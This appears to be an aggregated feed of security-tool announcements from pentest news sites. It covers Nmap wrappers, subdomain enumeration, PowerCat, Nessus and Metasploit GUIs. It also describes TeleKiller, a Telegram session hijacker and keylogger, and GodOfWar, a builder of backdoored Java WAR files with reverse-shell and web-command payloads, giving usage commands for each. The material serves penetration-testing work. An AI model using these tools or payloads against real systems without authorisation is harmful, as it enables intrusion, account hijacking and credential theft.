Trigmap – A Wrapper For Nmap To Automate The Pentest

Trigmap is a wrapper for Nmap. You can use it to easily start Nmap scan and especially to collect informations into a well organized directory hierarchy. The use of Nmap makes the script portable (easy to run not only on Kali Linux) and very efficient thanks to the optimized Nmap algorithms.DetailsTrigmap can performs several tasks using Nmap scripting engine (NSE):Port ScanService and Version DetectionWeb Resources EnumerationVulnerability AssessmentCommon Vulnerabilities TestCommon Exploits TestDictionary Attacks Against Active ServicesDefault Credentials TestUsageTrigmap can be used in two ways:Interactive mode:trigmap [ENTER], and the script does the restNON-interactive mode:trigmap -h|–host [-tp|–tcp TCP ports] [-up|–udp UDP ports] [-f|–file file path] [-s|–speed time profile] [-n|–nic NIC] [-p|–phase phases]If you want to see the help: trigmap –help to print this helperFor more screenshots see the relative directory of the repository.Dir HierarchyCustomizationIt’s possible to customize the script by changing the value of variables at the beginning of the file. In particularly you can choose the wordlists used by the Nmap scripts and the most important Nmap scan parameters (ping, scan, timing and script).################################################# PARAMETERS #################################################GENERAL_USER_LIST=’general_user_wordlist_short.txt’WIN_USER_LIST=’win_user_wordlist_short.txt’UNIX_USER_LIST=’unix_user_wordlist_short.txt’SHORT_PASS_LIST=’fasttrack.txt’LONG_PASS_LIST=’rockyou.txt’################################################# NMAP SETTING ################################################## PE (echo req), PP (timestamp-request)# you can add a port on every ping scanNMAP_PING=’-PE -PS80,443,22,25,110,445 -PU -PP -PA80,443,22,25,110,445’NMAP_OTHER=’-sV –allports -O –fuzzy –min-hostgroup 256’SCRIPT_VA='(auth or vuln or exploit or http-* and not dos)’SCRIPT_BRUTE='(auth or vuln or exploit or http-* or brute and not dos)’SCRIPT_ARGS=”userdb=$GENERAL_USER_LIST,passdb=$SHORT_PAS S_LIST"CUSTOM_SCAN=’–max-retries 3 –min-rate 250′ # LIKE UNICORNSCANTwin BrotherThis project is very similar to Kaboom, but it has a different philosophy; infact, it uses only Nmap, while Kaboom uses different tools, one for each task. The peculiarity of Trigmap is the portability and the efficient, but it’s recommended to use both the tools to scan the targets in a such way to gather more evidence with different tools (redundancy and reliability).Download Trigmap

Link: http://feedproxy.google.com/~r/PentestTools/~3/4v03LmjMcd4/trigmap-wrapper-for-nmap-to-automate.html

Horn3t – Powerful Visual Subdomain Enumeration At The Click Of A Mouse

Horn3t is your Nr #1 tool for exploring subdomains visually.Building on the great Sublist3r framework (or extensible with your favorite one) it searches for subdomains and generates awesome picture previews. Get a fast overview of your target with http status codes, add custom found subdomains and directly access found urls with one click.Recon your targets at blazing speedEnhance your productivity by focusing on interesting looking sitesEnumerate critical sites immediatelySting your targetInstallationInstall Google ChromeInstall requirements.txt with pip3Install requirements.txt of sublist3r with pip3Put the directory within the web server of your choiceMake sure to have the right permissionsRun horn3t.pyOr alternatively use the install.sh file with docker.Afterwards you can access the web portal under http://localhost:1337TodoBetter Scaling on FirefoxAdd Windows DockerfileDirekt Nmap Support per click on a subdomainDirekt Dirb Support per click on a subdomainGenerate PDF Reports of found subdomainsAssist with subdomain takeoverCreditsaboul3la – The creator of Sublist3r; turbolist3r adds some features but is otherwise a near clone of sublist3r.TheRook – The bruteforce module was based on his script subbrute.bitquark – The Subbrute’s wordlist was based on his research dnspop.Tested on Windows 10 and Debian with Google Chrome/Chromium 73Download Horn3t

Link: http://www.kitploit.com/2019/05/horn3t-powerful-visual-subdomain.html

PowerCat -A PowerShell Netcat

The word PowerCat named from Powershell Netcat which is a new version of netcat in the form of the powershell script. In this article, we will learn about powercat which a PowerShell tool for is exploiting windows machines. Table of Content Requirement & Installations Testing PowerShell Communication Bind Shell Execute Shell Tunnelling or port forwarding… Continue reading →
The post PowerCat -A PowerShell Netcat appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/powercat-a-powershell-netcat/

Web Server Lab Setup for Penetration Testing

In this post, we will discuss how to set-up our own web server for penetration testing on Ubuntu 18. Ubuntu 18 has updated with the new features. Table of Content Requirement Web Server configuration Apache PHP MySQL phpMyAdmin FTP SSH Nmap Requirement-ubuntu 18.0 Web Server Configuration The Web server is a program that uses HTTP to serve users with files forming web pages in response to requests transmitted by their HTTP clients. The Web servers can also be called dedicated computers and apparatuses. Install Apache First, we will install the Apache…. Continue reading →
The post Web Server Lab Setup for Penetration Testing appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/web-server-lab-setup-for-penetration-testing/

UPDATE: MITRE CALDERA 2.0

PenTestIT RSS Feed
I read a tweet about two days ago and today, MITRE CALDERA 2.0 is out already! If you remember, I wrote briefly about this automated adversary emulation system in my post titled – List of Adversary Emulation Tools. This is a major update and this post is about the changes I personally see in thisRead more about UPDATE: MITRE CALDERA 2.0
The post UPDATE: MITRE CALDERA 2.0 appeared first on PenTestIT.

Link: http://pentestit.com/update-mitre-caldera-2-0/

Reverie – Automated Pentest Tools Designed For Parrot Linux

Automated Pentest Tools Designed For Parrot Linux.this tool will make your basic pentesting task like Information Gathering, Security Auditing, And Reporting so this tool will do every task fully automatic.Usage GuideDownload / Clone~# git clone https://github.com/baguswiratmaadi/reverieGo Inside reverie Dir~# cd reverieGive Permission To reverie~# chmod 777 *.shRun reverie without install~# ./reverie.shIf you want to install reverie~# ./install.shChangelog1.0 First Release 1.1 Fixing Error In Nikto Command Line Pentest Tools Auto Executed With ReverieWhois LookupDNSwalkNmapDmitryWhatwebwafw00fLoad Balancing DetectorSSLyzeTLSSledAutomaterNiktoAnd More Tool SoonScreenshotthis is preview of Reverie Auto PentestTools Preview Output ResultReport In HTML DisclaimerDo not scan government and private IT objects without legal permission.Do At Your Own RiskDownload Reverie

Link: http://feedproxy.google.com/~r/PentestTools/~3/I5j5E3B9o2w/reverie-automated-pentest-tools.html

TeleKiller – A Tool Session Hijacking And Stealer Local Passcode Telegram Windows

A Tools Session Hijacking And Stealer Local passcode Telegram Windows.Features :Session HijackingStealer Local PasscodeKeyloggerShellBypass 2 Step VerificationBypass Av (Coming Soon)Installation Windowsgit clone https://github.com/ultrasecurity/TeleKiller.gitcd TeleKillerpip install -r requirements.txtpython TeleKiller.pyDependency :python 2.7pyHookpywin32Video TutorialOperating Systems TestedWindows 10Windows 8.1Windows 8Windows 7ContactWebSite Ultra Security Team: https://ultrasec.orgChannel Telegram: https://t.me/UltraSecurityThanks toMilad RanjbarMrQadirDownload TeleKiller

Link: http://www.kitploit.com/2019/04/telekiller-tool-session-hijacking-and.html

GodOfWar – Malicious Java WAR Builder With Built-In Payloads

A command-line tool to generate war payloads for penetration testing / red teaming purposes, written in ruby.FeaturesPreexisting payloads. (try -l/–list)cmd_getfilebrowserbind_shellreverse_shellreverse_shell_uiConfigurable backdoor. (try –host/-port)Control over payload name.To avoid malicious name after deployment to bypass URL name signatures.Installation$ gem install godofwarUsage$ godofwar -h Help menu: -p, –payload PAYLOAD Generates war from one of the available payloads. (check -l/–list) -H, –host IP_ADDR Local or Remote IP address for the chosen payload (used with -p/–payload) -P, –port PORT Local or Remote Port for the chosen payload (used with -p/–payload) -o, –output [FILE] Output file and the deployment name. (default is the payload original name. check ‘-l/–list’) -l, –list list all available payloads. -h, –help Show this help message.ExampleList all payloads$ godofwar -l├── cmd_get│   └── Information:│ ├── Description: Command execution via web interface│ ├── OS: any│ ├── Settings: {“false"=>"No Settings required!"}│ ├── Usage: http://host/cmd.jsp?cmd=whoami│ ├── References: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get├── filebrowser│   └── Information:│ ├── Description: Remote file browser, upload, download, unzip files and native command execution│ ├── OS: any│ &#9500 ;── Settings: {"false"=>"No Settings required!"}│ ├── Usage: http://host/filebrowser.jsp│ ├── References: ["http://www.vonloesch.de/filebrowser.html"]│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser├── bind_shell│   └── Information:│ ├── Description: TCP bind shell│ ├── OS: any│ ├── Settings: {"port"=>4444, "false"=>"No Settings required!"}│ ├── Usage: http://host/reverse-shell.jsp│ ├── References: ["Metasploit – msfvenom -p java/jsp_shell_bind_tcp"]│ └ ── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell├── reverse_shell_ui│   └── Information:│ ├── Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.│ ├── OS: any│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}│ ├── Usage: http://host/reverse_shell_ui.jsp│ ├── References: []│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui├── reverse_shell│   └── Information:│ ├── De scription: TCP reverse shell. LHOST and LPORT are hardcoded│ ├── OS: any│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}│ ├── Usage: http://host/reverse_shell.jsp│ ├── References: []│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shellGenerate payload with LHOST and LPORTgodofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppyAfter deployment, you can visit your shell on (http://host:8080/puppy/puppy.jsp)ContributingFork it ( https://github.com/KINGSABRI/godofwar/fork ).Create your feature branch (git checkout -b my-new-feature).Commit your changes (git commit -am ‘Add some feature’).Push to the branch (git push origin my-new-feature).Create a new Pull Request.Add More BackdoorsTo contribute by adding more backdoors:create a new folder under payloads directory.put your jsp file under the newly created directory (make it the same directory name).update payloads_info.json file withdescription.supported operating system (try to make it universal though).configurations: default host and port.references: the payload origin or its creator credits.Download Godofwar

Link: http://feedproxy.google.com/~r/PentestTools/~3/48DUIB_ttEQ/godofwar-malicious-java-war-builder.html

Beginner’s Guide to Nessus

In this article, we will learn about Nessus which is a network vulnerability scanner. There are various network vulnerability scanners but Nessus is one of the best because of its most successful GUI. Therefore, it is widely used in multiple organizations. The tools were developed by Renuad Deraison in the year 1998. Table of Content… Continue reading →
The post Beginner’s Guide to Nessus appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/beginners-guide-to-nessus/

Kage: Graphical User Interface for Metasploit

Kage is a GUI for Metasploit RCP servers. It is a good tool for beginners to understand the working of Metasploit as it generates payload and lets you interact with sessions. As this tool is on the process of developing, till now it only supports windows/meterpreter and android/meterpreter.  For it to work, you should have… Continue reading →
The post Kage: Graphical User Interface for Metasploit appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/kage-graphical-user-interface-for-metasploit/